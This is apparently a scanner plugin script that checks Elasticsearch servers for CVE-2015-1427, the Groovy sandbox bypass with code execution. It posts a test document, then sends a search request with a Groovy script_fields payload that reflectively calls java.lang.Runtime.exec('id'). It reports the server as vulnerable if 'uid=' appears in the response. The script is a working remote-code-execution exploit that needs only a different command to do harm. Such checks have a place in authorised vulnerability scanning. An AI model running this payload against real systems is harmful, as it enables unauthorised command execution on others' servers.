#request url = var
#define payload = /website/blog/
#define bug = uid=
#define info = 存在ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞（CVE-2015-1427）
#define post = {  "name": "test"}
#define postt = {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

function main(args)
{
	HttpPost(url.payload,post,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
	res = HttpPost(url."/_search?pretty",postt,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
	if(StrFindStr(res[0],bug,0)!= "-1")
	{
		print(url.info);
	}
}
